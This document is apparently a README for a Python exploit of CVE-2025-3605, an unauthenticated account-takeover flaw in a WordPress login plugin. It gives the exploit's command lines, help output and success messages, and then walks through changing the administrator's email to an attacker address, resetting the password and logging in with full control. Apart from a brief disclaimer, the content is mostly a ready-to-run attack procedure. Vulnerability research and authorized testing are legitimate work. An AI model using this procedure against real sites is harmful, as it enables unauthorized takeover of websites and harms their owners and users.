
# 🚀 CVE-2025-3605 Exploit Guide

### 🛡️ Vulnerability Summary
The **Frontend Login and Registration Blocks** plugin for WordPress (versions <= 1.0.7) is vulnerable to **privilege escalation via account takeover**.  
The issue arises because the plugin does **not validate user identity** when updating sensitive details like email through the `flr_blocks_user_settings_handle_ajax_callback()` function.

✅ **Impact:**  
An unauthenticated attacker can change the administrator's email, trigger the "Forgot Password" process, and reset the admin password, gaining full control.

---

### 💥 Proof of Concept (PoC)
The included Python script automates the exploitation process by targeting the vulnerable AJAX endpoint:

```
/wp-admin/admin-ajax.php
```

It updates the email of the targeted user (typically user_id `1` for admin) to an attacker-controlled email.

---

### 📦 Included Script

**Filename:** `CVE-2025-3605.py`

```
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail attacker@example.com
```

✅ **Default values:**  
- `--user_id`: 1 (default admin)  
- `--mail`: NxploitBot@gmail.com

---

### 🖥️ Usage & Help

To see the help menu, run:

```
python CVE-2025-3605.py --help
```

Output:
```
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]

Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target URL, e.g., http://192.168.100.74:888/wordpress
  --user_id, -id USER_ID
                        User ID to target (default: 1)
  --mail, -mail MAIL    Email to set (default: NxploitBot@gmail.com)
```

✅ Example Run:
```
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail attacker@example.com
```

---

### 🎯 Expected Output

✅ On success:
```
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )
```

❌ On failure:
```
[!] Exploit failed. HTTP Status: 400
[!] Response: 0
```

---

### 🔑 After Exploitation

1️⃣ Navigate to:
```
http://target-site/wordpress/wp-login.php
```

2️⃣ Enter the **new email** you set (`attacker@example.com`).

3️⃣ Request a password reset.

4️⃣ Set a new password.

5️⃣ Login as **administrator** and enjoy full access.

---

### ⚠️ Disclaimer

This exploit and script are provided **for educational and authorized testing purposes only**.  
Any unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.

---

*By: Khaled Alenazi (Nxploited)*
